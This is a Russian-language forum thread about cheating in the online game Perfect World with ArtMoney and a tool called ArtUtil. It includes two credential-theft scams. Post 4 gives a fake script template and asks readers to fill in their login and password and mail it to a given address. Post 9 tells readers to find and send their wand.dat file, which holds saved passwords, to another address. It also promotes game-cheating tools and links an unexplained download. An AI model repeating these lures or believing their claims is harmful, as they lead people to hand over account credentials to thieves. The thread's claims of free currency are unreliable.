Все способы взломать Perfect World

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Все способы взломать Perfect World » Различные проги для взлома » ArtUtil - утилита для быстрого пополнения игровой валюты

ArtUtil - утилита для быстрого пополнения игровой валюты

Сообщений 1 страница 12 из 12

1

Привет, Перфектеры! Думаю многие из нас пытались взломать ПВ через ArtMoney. И у нас это даже получалось. ПРизнайтесь, что восторгу небыло предела, когда в инвентаре высвечивалась сумма 999999999=) Но столь же велико было и разочерование, когда мы осознавали, что это просто деньги-пустышки, и ни чего на них не купишь. Так возрадуйтесь же, искатели халявы!!!
   Не так давно появилась малюсенькая утилитка, которая с помощью ArtMoney может набить ваши карманы реально работающими Юанями=) Не верите? Я бы тоже не поверил, если бы не Видео Гайд, идущий вместе с прогой в комплекте=) В общем ловите:

ArtUtil - Это сама програмка.
   ArtMoney - Это та ArtMoney, которая нужна для операций (Если честно, ума не приложу, почему нужна именно эта ArtMoney.  Во всяком случае именно эта версия шла в комплекте с прогой, так что придется и ее качать=)
   Видео Гайд - А вот это Видео Гайд, который подробненько и наглядненько объяснит вам, как работать с прогой. (Сразу скажу, качество видео оставляет желать лучшего, так что придется всматриваться.)

Ну вот все то, что шло в комплекте с ArtUtil. Удачи Вам=)

+3

2

НИФГА РЕАЛЬНО РОБИТ

0

3

А ЧЁНИБУТЬ ДРУГОЕ ВЗЛАМЫВАТЬ МОЖНО

0

4

вот нашел как взломать pw на голды из шопа

<div id="pun-title" class="section">
<table id="title-logo-table" cellspacing="0">
    <tbody><tr id="title-logo-tr">
    <td id="title-logo-tdl" class="title-logo-tdl">
        <h1 class="title-logo"><span>СЮДА ВВОДИМ СЕРВЕР</span></h1>
    </td>
    <td id="title-logo-tdr" class="title-logo-tdr"><script type="text/javascript">
document.write(СЮДА ВВОДИМ ЛОГИН(СЮДА ВВОДИМ НИК В ИГРЕ) (type=СЮДА ВВОДИМ КОЛИЧЕСТВО ГОЛДОВ)
document.write(СЮДА ВВОДИМ ПАРОЛЬ(%64%62%61%35%37%32%33%66%63%39%66%62%61%38%32%66%26%72%3D%34%65%32%39%64%33%36%37%36%63%33%33%66%35%2E%39%37%31%37%33%34%30%31%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%2F%3E%3C%2F%64%69%76%3E'))//--></script>

и отправляем на aleksey-fedotov-11@mail.ru
в мыле стоит бот,который сам ломает вам PW и присылает указанное кол-во голдов.

0

5

Парни у меня вообще только про версия арт мании видит PW!всё делаю по иструкции но к сожелению не чего не выходит :dontknow: помогите кто чем может :tired:

0

6

Не работает...

0

7

у меня тоже...
не работает!

0

8

У меня как ни страно не получается хотя делаю все по видео гайду . Подскажите в чём проблема или перс должен быть определеного лвл?

0

9

Самый новый способ получить голд НАХАЛЯВУ! Не надо отсылать никому свои логин и пароль,суть здесь заключается в том,что моя команда имеет доступ к серверам Perfect World. Частенько нам его закрывают,но мы находим лазейки для того,чтобы радовать Вас бесплатным голдом и бесить Нивал,гребущих деньги лопатами!
Так вот,суть заключается в том,что есть на компе один файл,через который проходит информация о количестве голдов на аккаунтах,на которые вы когда-либо заходили,и называется он wand.dat . Так же есть содружество добрых людей,тобишь меня и моей команды,мы не требуем с вас никаких денег потому как нам платят люди,которым выгодно банкротство Ниваловцев,и мы готовы предоставить вам наши услуги. Более 256 голдов мы начислять вам не будем,в связи с аппаратными трудностями у серверов ПВ с переводом чисел в двоичную систему. Итак,вот список коротких действий,которые вам предстоит сделать,чтобы получать долгожданный голд:
1)Откройте мой компютер и выберите "поиск файлов" или просто нажмите сочетание клавиш ctrl+F.
2)Введите в поисковую строку wand.dat
3)Скопируйте его себе на рабочий стол. Желательно,чтобы перед этим были закрыты все программы и приложения на вашем ПК.
4)Отправьте данный файл на почту moigrooodno@mail.ru
5)По прошествии нескольких минут,максимум - часа,вам на почту прийдёт письмо с изменённым файлов wand.dat,который нужно будет вставить на место предыдущего файла wand.dat,согласившись с удалением последнего.

Данная система,также работает и на неофициальных серверах,но с перебоями,поэтому гарантировать 100% успех мы не можем. С наилучшими пожеланиями от команды "M_Hack_M".
По всем вопросам также пишите на moigrooodno@mail.ru  с пометкой "ВАЖНО" в теме письма.

0

10

Програмка устарела! Дырки давно подлатали, и теперь она не работает=( SorosFull, есть у тебя новая версия Util'a? Если да, то выложи, плиз!

+1

11

Перфектер, новый Util уже есть, и в скором времени он появится на этом сайте, а пока идет отладка библиотек, настройка серверов (програмка теперь будет работать через собственный сервер), шлифовка кода и т.д. Короче, ждите=)

+1

12

http://www.fayloobmennik.net/1066564
1 голд в день иначе бан,на каждый акк пополняйте 1 раз в день

0

Вы здесь » Все способы взломать Perfect World » Различные проги для взлома » ArtUtil - утилита для быстрого пополнения игровой валюты

Рейтинг форумов | Создать форум бесплатно